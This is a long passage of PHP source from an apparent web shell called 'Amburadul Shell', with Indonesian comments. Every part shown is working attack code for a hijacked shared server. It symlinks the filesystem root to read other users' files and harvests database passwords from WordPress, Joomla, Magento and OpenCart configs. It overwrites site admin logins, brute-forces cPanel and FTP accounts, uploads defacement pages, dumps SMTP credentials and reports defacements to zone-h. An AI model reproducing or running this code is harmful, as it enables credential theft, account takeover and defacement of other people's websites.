  875.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  876.  continue;
  877.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  878. <td align=center><font class=txt>" . $matches . "</td>";
  879.  echo "<td align=center><font class=txt><a href=$full/Cr0tz_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  880.  $dcount++;}fclose($file);
  881.  echo "</table>";}else{if($os != "Windows"){@mkdir("Cr0tz_Symlink",0777);@chdir("Cr0tz_Symlink");@exe("ln -s / root");$file3 = '
  882. Options Indexes FollowSymLinks
  883. DirectoryIndex 0xaN0n.htm
  884. AddType text/plain .php
  885. AddHandler text/plain .php
  886. Satisfy Any
  887. ';
  888.  $fp3 = fopen('.htaccess','w');
  889.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  890.  echo "
  891. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  892. <table align=center border=1><tr>
  893. <td align=center><font size=3>ID</font></td>
  894. <td align=center><font size=3>Users</font></td>
  895. <td align=center><font size=3>Symlink</font></td></tr>";
  896.  $temp = "";$val1 = 0;$val2 = 1000;
  897.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  898.  if ($uid)$temp .= join(':',$uid)."\n";}
  899.  echo '<br/>';$temp = trim($temp);$file5 =
  900.  fopen("test.txt","w");
  901.  fputs($file5,$temp);
  902.  fclose($file5);$dcount = 1;$file =
  903.  fopen("test.txt", "r") or exit("Unable to open file!");
  904.  while(!feof($file)){$s = fgets($file);$matches = array();
  905.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  906.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  907.  continue;
  908.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  909. <td align=center><font class=txt>" . $matches . "</td>";
  910.  echo "<td align=center><font class=txt><a href=$full/Cr0tz_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  911.  $dcount++;}
  912.  fclose($file);
  913.  echo "</table></div></center>";unlink("test.txt");
  914.  } else
  915.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  916.  }
  917.  }    
  918. } elseif($_GET['do'] == 'auto_edit_user') {
  919.     if($_POST['hajar']) {
  920.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  921.             echo "username atau password harus lebih dari 6 karakter";
  922.         } else {
  923.             $user_baru = $_POST['user_baru'];
  924.             $pass_baru = md5($_POST['pass_baru']);
  925.             $conf = $_POST['config_dir'];
  926.             $scan_conf = scandir($conf);
  927.             foreach($scan_conf as $file_conf) {
  928.                 if(!is_file("$conf/$file_conf")) continue;
  929.                 $config = file_get_contents("$conf/$file_conf");
  930.                 if(preg_match("/JConfig|joomla/",$config)) {
  931.                     $dbhost = ambilkata($config,"host = '","'");
  932.                     $dbuser = ambilkata($config,"user = '","'");
  933.                     $dbpass = ambilkata($config,"password = '","'");
  934.                     $dbname = ambilkata($config,"db = '","'");
  935.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  936.                     $prefix = $dbprefix."users";
  937.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  938.                     $db = mysql_select_db($dbname);
  939.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  940.                     $result = mysql_fetch_array($q);
  941.                     $id = $result['id'];
  942.                     $site = ambilkata($config,"sitename = '","'");
  943.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  944.                     echo "Config => ".$file_conf."<br>";
  945.                     echo "CMS => Joomla<br>";
  946.                     if($site == '') {
  947.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  948.                     } else {
  949.                         echo "Sitename => $site<br>";
  950.                     }
  951.                     if(!$update OR !$conn OR !$db) {
  952.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  953.                     } else {
  954.                         echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  955.                     }
  956.                     mysql_close($conn);
  957.                 } elseif(preg_match("/WordPress/",$config)) {
  958.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  959.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  960.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  961.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  962.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  963.                     $prefix = $dbprefix."users";
  964.                     $option = $dbprefix."options";
  965.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  966.                     $db = mysql_select_db($dbname);
  967.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  968.                     $result = mysql_fetch_array($q);
  969.                     $id = $result[ID];
  970.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  971.                     $result2 = mysql_fetch_array($q2);
  972.                     $target = $result2[option_value];
  973.                     if($target == '') {
  974.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  975.                     } else {
  976.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  977.                     }
  978.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  979.                     echo "Config => ".$file_conf."<br>";
  980.                     echo "CMS => Wordpress<br>";
  981.                     echo $url_target;
  982.                     if(!$update OR !$conn OR !$db) {
  983.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  984.                     } else {
  985.                         echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  986.                     }
  987.                     mysql_close($conn);
  988.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  989.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  990.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  991.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  992.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  993.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  994.                     $prefix = $dbprefix."admin_user";
  995.                     $option = $dbprefix."core_config_data";
  996.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  997.                     $db = mysql_select_db($dbname);
  998.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  999.                     $result = mysql_fetch_array($q);
  1000.                     $id = $result[user_id];
  1001.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1002.                     $result2 = mysql_fetch_array($q2);
  1003.                     $target = $result2[value];
  1004.                     if($target == '') {
  1005.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1006.                     } else {
  1007.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1008.                     }
  1009.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1010.                     echo "Config => ".$file_conf."<br>";
  1011.                     echo "CMS => Magento<br>";
  1012.                     echo $url_target;
  1013.                     if(!$update OR !$conn OR !$db) {
  1014.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1015.                     } else {
  1016.                         echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1017.                     }
  1018.                     mysql_close($conn);
  1019.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1020.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1021.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1022.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1023.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1024.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1025.                     $prefix = $dbprefix."user";
  1026.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1027.                     $db = mysql_select_db($dbname);
  1028.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1029.                     $result = mysql_fetch_array($q);
  1030.                     $id = $result[user_id];
  1031.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1032.                     if($target == '') {
  1033.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1034.                     } else {
  1035.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1036.                     }
  1037.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1038.                     echo "Config => ".$file_conf."<br>";
  1039.                     echo "CMS => OpenCart<br>";
  1040.                     echo $url_target;
  1041.                     if(!$update OR !$conn OR !$db) {
  1042.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1043.                     } else {
  1044.                         echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1045.                     }
  1046.                     mysql_close($conn);
  1047.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1048.                     $dbhost = ambilkata($config,'server = "','"');
  1049.                     $dbuser = ambilkata($config,'username = "','"');
  1050.                     $dbpass = ambilkata($config,'password = "','"');
  1051.                     $dbname = ambilkata($config,'database = "','"');
  1052.                     $prefix = "users";
  1053.                     $option = "identitas";
  1054.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1055.                     $db = mysql_select_db($dbname);
  1056.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1057.                     $result = mysql_fetch_array($q);
  1058.                     $target = $result[alamat_website];
  1059.                     if($target == '') {
  1060.                         $target2 = $result[url];
  1061.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1062.                         if($target2 == '') {
  1063.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1064.                         } else {
  1065.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1066.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1067.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1068.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1069.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1070.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1071.                             } else {
  1072.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1073.                             }
  1074.                         }
  1075.                     } else {
  1076.                         $cek_login = file_get_contents("$target/adminweb/");
  1077.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1078.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1079.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1080.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1081.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1082.                         } else {
  1083.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1084.                         }
  1085.                     }
  1086.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1087.                     echo "Config => ".$file_conf."<br>";
  1088.                     echo "CMS => Lokomedia<br>";
  1089.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1090.                         echo $url_target2;
  1091.                     } else {
  1092.                         echo $url_target;
  1093.                     }
  1094.                     if(!$update OR !$conn OR !$db) {
  1095.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1096.                     } else {
  1097.                         echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1098.                     }
  1099.                     mysql_close($conn);
  1100.                 }
  1101.             }
  1102.         }
  1103.     } else {
  1104.         echo "<center>
  1105.         <h1>Auto Edit User Config</h1>
  1106.         <form method='post'>
  1107.         DIR Config: <br>
  1108.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1109.         Set User & Pass: <br>
  1110.         <input type='text' name='user_baru' value='Acil123' placeholder='user_baru'><br>
  1111.         <input type='text' name='pass_baru' value='Acil123' placeholder='pass_baru'><br>
  1112.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1113.         </form>
  1114.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1115.         ";
  1116.     }
  1117. } elseif($_GET['do'] == 'cpanel') {
  1118.     if($_POST['crack']) {
  1119.         $usercp = explode("\r\n", $_POST['user_cp']);
  1120.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1121.         $i = 0;
  1122.         foreach($usercp as $ucp) {
  1123.             foreach($passcp as $pcp) {
  1124.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1125.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1126.                     } else {
  1127.                         $_SESSION[$ucp] = "1";
  1128.                         $_SESSION[$pcp] = "1";
  1129.                         if($ucp == '' || $pcp == '') {
  1130.                            
  1131.                         } else {
  1132.                             $i++;
  1133.                             if(function_exists('posix_getpwuid')) {
  1134.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  1135.                                 if($domain_cp == '') {
  1136.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  1137.                                 } else {
  1138.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1139.                                     foreach($domains_cp[1] as $dj) {
  1140.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1141.                                         $user_cp_url = $user_cp_url['name'];
  1142.                                         if($user_cp_url == $ucp) {
  1143.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=white>$dj</font></a>";
  1144.                                             break;
  1145.                                         }
  1146.                                     }
  1147.                                 }
  1148.                             } else {
  1149.                                 $dom = "<font color=red>function is Disable by system</font>";
  1150.                             }
  1151.                             echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>) domain ($dom)<br>";
  1152.                         }
  1153.                     }
  1154.                 }
  1155.             }
  1156.         }
  1157.         if($i == 0) {
  1158.         } else {
  1159.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=red>Amburadul Shell.</font>";
  1160.         }
  1161.     } else {
  1162.         echo "<center>
  1163.         <form method='post'>
  1164.         USER: <br>
  1165.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1166.         $_usercp = fopen("/etc/passwd","r");
  1167.         while($getu = fgets($_usercp)) {
  1168.             if($getu == '' || !$_usercp) {
  1169.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1170.             } else {
  1171.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1172.                 foreach($u[1] as $user_cp) {
  1173.                         if(is_dir("/home/$user_cp/public_html")) {
  1174.                             echo "$user_cp\n";
  1175.                     }
  1176.                 }
  1177.             }
  1178.         }
  1179.         echo "</textarea><br>
  1180.         PASS: <br>
  1181.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1182.         function cp_pass($dir) {
  1183.             $pass = "";
  1184.             $dira = scandir($dir);
  1185.             foreach($dira as $dirb) {
  1186.                 if(!is_file("$dir/$dirb")) continue;
  1187.                 $ambil = file_get_contents("$dir/$dirb");
  1188.                 if(preg_match("/WordPress/", $ambil)) {
  1189.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1190.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1191.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1192.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1193.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1194.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1195.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1196.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1197.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1198.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  1199.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  1200.                     if(preg_match('/"/', $pass1[1])) {
  1201.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1202.                         $pass .= $pass1[1]."\n";
  1203.                     } else {
  1204.                         $pass .= $pass1[1]."\n";
  1205.                     }
  1206.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1207.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1208.                 }
  1209.             }
  1210.             echo $pass;
  1211.         }
  1212.         $cp_pass = cp_pass($dir);
  1213.         echo $cp_pass;
  1214.         echo "</textarea><br>
  1215.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1216.         </form>
  1217.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1218.     }
  1219. } elseif($_GET['do'] == 'cpftp_auto') {
  1220.     if($_POST['crack']) {
  1221.         $usercp = explode("\r\n", $_POST['user_cp']);
  1222.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1223.         $i = 0;
  1224.         foreach($usercp as $ucp) {
  1225.             foreach($passcp as $pcp) {
  1226.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1227.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1228.                     } else {
  1229.                         $_SESSION[$ucp] = "1";
  1230.                         $_SESSION[$pcp] = "1";
  1231.                         if($ucp == '' || $pcp == '') {
  1232.                             //
  1233.                         } else {
  1234.                             echo "[+] username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
  1235.                             $ftp_conn = ftp_connect($ip);
  1236.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1237.                             if((!$ftp_login) || (!$ftp_conn)) {
  1238.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  1239.                             } else {
  1240.                                 echo "[+] <font color=white>Login Sukses</font><br>";
  1241.                                 $fi = htmlspecialchars($_POST['file_deface']);
  1242.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1243.                                 if($deface) {
  1244.                                     $i++;
  1245.                                     echo "[+] <font color=white>Deface Sukses</font><br>";
  1246.                                     if(function_exists('posix_getpwuid')) {
  1247.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  1248.                                         if($domain_cp == '') {
  1249.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1250.                                         } else {
  1251.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1252.                                             foreach($domains_cp[1] as $dj) {
  1253.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1254.                                                 $user_cp_url = $user_cp_url['name'];
  1255.                                                 if($user_cp_url == $ucp) {
  1256.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1257.                                                     break;
  1258.                                                 }
  1259.                                             }
  1260.                                         }
  1261.                                     } else {
  1262.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1263.                                     }
  1264.                                 } else {
  1265.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1266.                                 }
  1267.                             }
  1268.                             //echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
  1269.                         }
  1270.                     }
  1271.                 }
  1272.             }
  1273.         }
  1274.         if($i == 0) {
  1275.         } else {
  1276.             echo "<br>sukses Crack".$i." Cpanel by <font color=white>Amburadul Shell.</font>";
  1277.         }
  1278.     } else {
  1279.         echo "<center>
  1280.         <form method='post'>
  1281.         Filename: <br>
  1282.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1283.         Deface Page: <br>
  1284.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1285.         USER: <br>
  1286.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1287.         $_usercp = fopen("/etc/passwd","r");
  1288.         while($getu = fgets($_usercp)) {
  1289.             if($getu == '' || !$_usercp) {
  1290.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1291.             } else {
  1292.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1293.                 foreach($u[1] as $user_cp) {
  1294.                         if(is_dir("/home/$user_cp/public_html")) {
  1295.                             echo "$user_cp\n";
  1296.                     }
  1297.                 }
  1298.             }
  1299.         }
  1300.         echo "</textarea><br>
  1301.         PASS: <br>
  1302.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1303.         function cp_pass($dir) {
  1304.             $pass = "";
  1305.             $dira = scandir($dir);
  1306.             foreach($dira as $dirb) {
  1307.                 if(!is_file("$dir/$dirb")) continue;
  1308.                 $ambil = file_get_contents("$dir/$dirb");
  1309.                 if(preg_match("/WordPress/", $ambil)) {
  1310.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1311.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1312.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1313.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1314.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1315.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1316.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1317.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1318.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1319.                 } elseif(preg_match("/client/", $ambil)) {
  1320.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1321.                     if(preg_match('/"/', $pass1[1])) {
  1322.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1323.                         $pass .= $pass1[1]."\n";
  1324.                     }
  1325.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1326.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1327.                 }
  1328.             }
  1329.             echo $pass;
  1330.         }
  1331.         $cp_pass = cp_pass($dir);
  1332.         echo $cp_pass;
  1333.         echo "</textarea><br>
  1334.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1335.         </form>
  1336.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1337.     }
  1338. } elseif($_GET['do'] == 'smtp') {
  1339.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1340.     function scj($dir) {
  1341.         $dira = scandir($dir);
  1342.         foreach($dira as $dirb) {
  1343.             if(!is_file("$dir/$dirb")) continue;
  1344.             $ambil = file_get_contents("$dir/$dirb");
  1345.             $ambil = str_replace("$", "", $ambil);
  1346.             if(preg_match("/JConfig|joomla/", $ambil)) {
  1347.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1348.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1349.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1350.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1351.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1352.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1353.                 echo "SMTP Host: <font color=white>$smtp_host</font><br>";
  1354.                 echo "SMTP port: <font color=white>$smtp_port</font><br>";
  1355.                 echo "SMTP user: <font color=white>$smtp_user</font><br>";
  1356.                 echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
  1357.                 echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
  1358.                 echo "SMTP secure: <font color=white>$smtp_secure</font><br><br>";
  1359.             }
  1360.         }
  1361.     }
  1362.     $smpt_hunter = scj($dir);
  1363.     echo $smpt_hunter;
  1364. } elseif($_GET['do'] == 'auto_wp') {
  1365.     if($_POST['hajar']) {
  1366.         $title = htmlspecialchars($_POST['new_title']);
  1367.         $pn_title = str_replace(" ", "-", $title);
  1368.         if($_POST['cek_edit'] == "Y") {
  1369.             $script = $_POST['edit_content'];
  1370.         } else {
  1371.             $script = $title;
  1372.         }
  1373.         $conf = $_POST['config_dir'];
  1374.         $scan_conf = scandir($conf);
  1375.         foreach($scan_conf as $file_conf) {
  1376.             if(!is_file("$conf/$file_conf")) continue;
  1377.             $config = file_get_contents("$conf/$file_conf");
  1378.             if(preg_match("/WordPress/", $config)) {
  1379.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1380.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1381.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1382.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1383.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1384.                 $prefix = $dbprefix."posts";
  1385.                 $option = $dbprefix."options";
  1386.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1387.                 $db = mysql_select_db($dbname);
  1388.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1389.                 $result = mysql_fetch_array($q);
  1390.                 $id = $result[ID];
  1391.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1392.                 $result2 = mysql_fetch_array($q2);
  1393.                 $target = $result2[option_value];
  1394.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1395.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1396.                 echo "<div style='margin: 5px auto;'>";
  1397.                 if($target == '') {
  1398.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1399.                 } else {
  1400.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1401.                 }
  1402.                 if(!$update OR !$conn OR !$db) {
  1403.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1404.                 } else {
  1405.                     echo "<font color=white>sukses di ganti bossque.</font><br>";
  1406.                 }
  1407.                 echo "</div>";
  1408.                 mysql_close($conn);
  1409.             }
  1410.         }
  1411.     } else {
  1412.         echo "<center>
  1413.         <h1>Auto Edit Title+Content WordPress</h1>
  1414.         <form method='post'>
  1415.         DIR Config: <br>
  1416.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1417.         Set Title: <br>
  1418.         <input type='text' name='new_title' value='Hacked by Mr.4c1L Cr0tZz' placeholder='New Title'><br><br>
  1419.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1420.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1421.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1422.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1423.         </form>
  1424.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1425.         ";
  1426.     }
  1427. } elseif($_GET['do'] == 'zoneh') {
  1428.     if($_POST['submit']) {
  1429.         $domain = explode("\r\n", $_POST['url']);
  1430.         $nick =  $_POST['nick'];
  1431.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1432.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1433.         function zoneh($url,$nick) {
  1434.             $ch = curl_init("http://www.zone-h.com/notify/single");
  1435.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1436.                   curl_setopt($ch, CURLOPT_POST, true);
  1437.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1438.             return curl_exec($ch);
  1439.                   curl_close($ch);
  1440.         }
  1441.         foreach($domain as $url) {
  1442.             $zoneh = zoneh($url,$nick);
  1443.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1444.                 echo "$url -> <font color=white>OK</font><br>";
  1445.             } else {
